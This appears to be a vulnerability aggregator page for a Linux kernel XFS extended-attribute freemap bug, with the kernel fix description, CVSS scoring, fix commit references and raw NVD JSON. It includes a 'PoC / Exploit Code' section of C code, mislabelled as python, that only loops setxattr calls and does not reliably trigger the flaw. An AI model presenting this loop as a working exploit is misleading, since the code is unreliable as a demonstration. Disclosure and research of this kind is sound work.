CVE-2026-43187

Description

In the Linux kernel, the following vulnerability has been resolved: xfs: delete attr leaf freemap entries when empty Back in commit 2a2b5932db6758 ("xfs: fix attr leaf header freemap.size underflow"), Brian Foster observed that it's possible for a small freemap at the end of the end of the xattr entries array to experience a size underflow when subtracting the space consumed by an expansion of the entries array. There are only three freemap entries, which means that it is not a complete index of all free space in the leaf block. This code can leave behind a zero-length freemap entry with a nonzero base. Subsequent setxattr operations can increase the base up to the point that it overlaps with another freemap entry. This isn't in and of itself a problem because the code in _leaf_add that finds free space ignores any freemap entry with zero size. However, there's another bug in the freemap update code in _leaf_add, which is that it fails to update a freemap entry that begins midway through the xattr entry that was just appended to the array. That can result in the freemap containing two entries with the same base but different sizes (0 for the "pushed-up" entry, nonzero for the entry that's actually tracking free space). A subsequent _leaf_add can then allocate xattr namevalue entries on top of the entries array, leading to data loss. But fixing that is for later. For now, eliminate the possibility of confusion by zeroing out the base of any freemap entry that has zero size. Because the freemap is not intended to be a complete index of free space, a subsequent failure to find any free space for a new xattr will trigger block compaction, which regenerates the freemap. It looks like this bug has been in the codebase for quite a long time.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel (受影响的稳定分支，具体参考补丁提交 479b05f, 6f13c1d 等)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <stdio.h>
#include <stdlib.h>
#include <sys/xattr.h>
#include <unistd.h>
#include <string.h>

/*
 * PoC for CVE-2026-43187
 * This script attempts to trigger the XFS freemap bug by repeatedly
 * setting extended attributes on a file. The goal is to cause the
 * freemap logic to fail and potentially corrupt data or trigger a crash.
 */

#define FILE_PATH "test_xfs_poc.txt"
#define ATTR_NAME "user.poc_attr"
#define ATTR_VALUE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

int main() {
    FILE *fp = fopen(FILE_PATH, "w");
    if (!fp) {
        perror("Failed to create file");
        return 1;
    }
    fclose(fp);

    printf("[+] Starting PoC for CVE-2026-43187\n");
    printf("[+] Target file: %s\n", FILE_PATH);

    // Loop to setxattr repeatedly to trigger freemap manipulation
    for (int i = 0; i < 10000; i++) {
        // Try to set an attribute. In a real scenario, specific sizes
        // and patterns might be needed to hit the exact underflow condition.
        int ret = setxattr(FILE_PATH, ATTR_NAME, ATTR_VALUE, strlen(ATTR_VALUE), 0);
        
        if (ret != 0) {
            perror("setxattr failed");
            // Depending on kernel state, this might fail or succeed
        }
        
        if (i % 1000 == 0) {
            printf("[+] Iteration %d completed...\n", i);
        }
    }

    printf("[+] PoC execution finished. Check dmesg for crashes or data corruption.\n");
    
    unlink(FILE_PATH);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43187
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43187
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43187/
[4] VulDB https://vuldb.com/cve/CVE-2026-43187
[5] https://git.kernel.org/stable/c/479b05fc3ee272090f671b06a41f3da8aa78eece
[6] https://git.kernel.org/stable/c/6f13c1d2a6271c2e73226864a0e83de2770b6f34
[7] https://git.kernel.org/stable/c/a631899025d47ea1aa6464d76db5b4d3b6d196fd
[8] https://git.kernel.org/stable/c/aa9083d97e2157da3c6fb45ddb1a97af7f188f7f
[9] https://git.kernel.org/stable/c/e1b8c6452ee99a30e188a88f3f3f804fb1c6004a
[10] https://git.kernel.org/stable/c/f31a8334e1c54b126fcecf98645a49b6bc5ad399
[11] https://git.kernel.org/stable/c/f3c0d1fc1eadbb4adbee5ab7757d41d35f48325b
[12] https://git.kernel.org/stable/c/ffaf5c99d0f862db021fb1af8b813c1416b1beb2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43187", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:37.440", "lastModified": "2026-05-11T20:38:50.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: delete attr leaf freemap entries when empty\n\nBack in commit 2a2b5932db6758 (\"xfs: fix attr leaf header freemap.size\nunderflow\"), Brian Foster observed that it's possible for a small\nfreemap at the end of the end of the xattr entries array to experience\na size underflow when subtracting the space consumed by an expansion of\nthe entries array. There are only three freemap entries, which means\nthat it is not a complete index of all free space in the leaf block.\n\nThis code can leave behind a zero-length freemap entry with a nonzero\nbase. Subsequent setxattr operations can increase the base up to the\npoint that it overlaps with another freemap entry. This isn't in and of\nitself a problem because the code in _leaf_add that finds free space\nignores any freemap entry with zero size.\n\nHowever, there's another bug in the freemap update code in _leaf_add,\nwhich is that it fails to update a freemap entry that begins midway\nthrough the xattr entry that was just appended to the array. That can\nresult in the freemap containing two entries with the same base but\ndifferent sizes (0 for the \"pushed-up\" entry, nonzero for the entry\nthat's actually tracking free space). A subsequent _leaf_add can then\nallocate xattr namevalue entries on top of the entries array, leading to\ndata loss. But fixing that is for later.\n\nFor now, eliminate the possibility of confusion by zeroing out the base\nof any freemap entry that has zero size. Because the freemap is not\nintended to be a complete index of free space, a subsequent failure to\nfind any free space for a new xattr will trigger block compaction, which\nregenerates the freemap.\n\nIt looks like this bug has been in the codebase for quite a long time."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-191"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.12.1", "versionEndExcluding": "5.10.252", "matchCriteriaId": "68B6D2AD-7565-4394-B77B-A1EEBCDF590F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.202", "matchCriteriaId": "4002FC2B-1456-4666-B240-0EBF590C4671"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.165", "matchCriteriaId": "797C7F46-D0BE-4FB8-A502-C5EF8E6B6654"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.75", "matchCriteriaId": "BCE16369-98ED-41CF-8995-DFDC10B288D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:-:*:*:*:*:*:*", "matchCriteriaId": "6F62EECE-8FB1-4D57-85D8-CB9E23CF313C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc2:*:*:*:*:*:*", "matchCriteriaId": "4F76C298-81DC-43E4-8FC9-DC005A2116EF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc3:*:*:*:*:*:*", "matchCriteriaId": "0AB349B2-3F78-4197-882B-90ADB3BF645A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc4:*:*:*:*:*:*", "matchCriteriaId": "6AC88830-A9BC-4607-B572-A4B502FC9FD0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc5:*:*:*:*:*:*", "matchCriteriaId": "476CB3A5-D022-4F13-AAEF-CB6A5785516A"}]}]}], "references": ... (truncated)